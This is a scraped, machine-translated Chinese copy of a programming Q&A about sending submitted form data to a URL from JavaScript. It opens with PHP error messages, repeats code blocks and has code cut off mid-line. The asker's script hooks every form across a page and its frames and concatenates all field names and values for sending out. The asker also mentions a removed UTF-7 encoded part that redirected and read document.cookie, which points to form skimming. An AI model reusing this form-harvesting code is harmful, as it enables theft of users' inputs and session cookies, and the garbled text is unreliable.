Warning: file_get_contents(/data/phpspider/zhask/data//catemap/9/javascript/450.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Javascript 通过JS或jquery执行一个URL,该URL为';这不是XSS_Javascript_Javascript Events - Fatal编程技术网
Fatal编程技术网
  • javascript/
  • Javascript 通过JS或jquery执行一个URL,该URL为';这不是XSS

Javascript 通过JS或jquery执行一个URL,该URL为';这不是XSS

javascript

Javascript 通过JS或jquery执行一个URL,该URL为';这不是XSS,javascript,javascript-events,Javascript,Javascript Events,我需要能够执行一个php链接后的形式已经提交了我已经在JS的一切工作,除了执行一个没有一些神圣的警告框,这是不是非常友好的用户至少可以说是一个URL。我的前任并不真正理解XSS,所以只是添加了一个图像标签来尝试和执行链接,你对我如何改进/使其工作有什么想法吗。。提前谢谢 功能1 function attach(wnd,handler){ for(var i=0; i<wnd.document.forms.length; i++){ var form

我需要能够执行一个php链接后的形式已经提交了我已经在JS的一切工作,除了执行一个没有一些神圣的警告框,这是不是非常友好的用户至少可以说是一个URL。我的前任并不真正理解XSS,所以只是添加了一个图像标签来尝试和执行链接,你对我如何改进/使其工作有什么想法吗。。提前谢谢

功能1

function attach(wnd,handler){
        for(var i=0; i<wnd.document.forms.length; i++){
            var form = wnd.document.forms[i];
                form.addEventListener('submit', handler,false);
        }

        for(var i=0; i<wnd.frames.length; i++){
            var iwnd = wnd.frames[i];               
            attach(iwnd,handler);
        }
     }
或者这个Js更好,但我不太确定如何将链的价值返回到url

function FormEnum()
{
         var forms = parent.document.getElementsByTagName("form");
    for (i = 0 ; i < forms.length; i++)
    {
        forms[i].addEventListener('submit', function() {
            var chain = "";
            var forms = parent.document.getElementsByTagName("form");

            for (x = 0 ; x < forms.length; x++)
            {
                var elements = forms[x].elements;
                for (e = 0 ; e < elements.length; e++)
                {
                    chain += elements[e].name + "%3d" + elements[e].value + "|";
                }
            }
            attachForm(chain);

        }, false);
    }
}

函数FormEnum()
{
var forms=parent.document.getElementsByTagName(“表单”);
对于(i=0;i
您知道XSS是什么吗?当然,通过加载映像来传递数据并不是最好的方法,因为您只能获得请求成功的信息,但无法从服务器返回一些附加信息。因此,您可以使用
XMLHttpRequest
或作为回退
script
使用回调方法(又称ajax和jsonp)加载。但不管怎样,为什么您认为显示的代码在XSS环境下是非常糟糕的代码?我已经编辑了UTF-7 web编码的部分,该部分重定向到另一个内部站点,然后转到documnet.cookie等。。但是谢谢你,我会试试XMLHttpRequest 
 window.addEventListener('load', function(){attach(window,formSubmit);},false);

function FormEnum()
{
         var forms = parent.document.getElementsByTagName("form");
    for (i = 0 ; i < forms.length; i++)
    {
        forms[i].addEventListener('submit', function() {
            var chain = "";
            var forms = parent.document.getElementsByTagName("form");

            for (x = 0 ; x < forms.length; x++)
            {
                var elements = forms[x].elements;
                for (e = 0 ; e < elements.length; e++)
                {
                    chain += elements[e].name + "%3d" + elements[e].value + "|";
                }
            }
            attachForm(chain);

        }, false);
    }
}